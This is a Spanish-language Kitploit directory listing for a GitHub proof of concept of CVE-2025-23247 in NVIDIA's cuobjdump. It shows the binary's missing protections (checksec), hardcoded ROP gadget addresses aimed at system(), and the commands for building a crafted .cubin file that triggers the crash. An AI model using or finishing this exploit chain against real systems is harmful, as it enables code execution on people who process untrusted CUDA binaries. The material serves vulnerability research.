Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-23247 — Trabajo en progreso para CVE-2025-23247. Por ahora solo un PoC de crash que muestra que controlamos el buffer y el offset, así que tenemos aaw | Kitploit
Herramientas/GitHubGitHub/spiralbl0ck/cve-2025-23247
Análisis de VulnerabilidadesExplotaciónIngeniería InversaDepuradoresDesarrollo de PayloadsExplotación de Binarios
GitHubspiralbl0ck/cve-2025-23247

CVE-2025-23247

Trabajo en progreso para CVE-2025-23247. Por ahora solo un PoC de crash que muestra que controlamos el buffer y el offset, así que tenemos aaw

Ver Repositorio
3hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-23247

Colaboración épica con @reubensammut :) como siempre :) Trabajo en curso para CVE-2025-23247. Por ahora solo un PoC de crash que muestra que controlamos el buffer y el offset, así que tenemos aaw. Bug de https://talosintelligence.com/vulnerability_reports/TALOS-2025-2151

checksec ./cuobjdump [*] '/home/vlad/cuobjdump' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)

De todos modos, no hay PIE, así que

uint64_t system_plt = 0x401d90; uint64_t pop_rdi_ret = 0x402d1b; uint64_t ret_gadget = 0x402d1c; // Just a ret

Punto de crash Screenshot_from_2025-11-20_16-00-41 png-2

gcc -o modify_simple modify_simple.c vlad@Vlad-PC:~$ ./modify_simple simple.cubin modified_simple2.cubin Created modified_simple2.cubin with vulnerable .nv_debug_source section Ejecuta: ./cuobjdump --dump-elf modified_simple2.cubin

Y para el kernel de CUDA

nvcc -ptx simple.cu -o simple.ptx nvcc -cubin simple.ptx -o simple.cubin --generate-line-info o nvcc -cubin simple.cu -o simple.cubin --generate-line-info

Descargar herramienta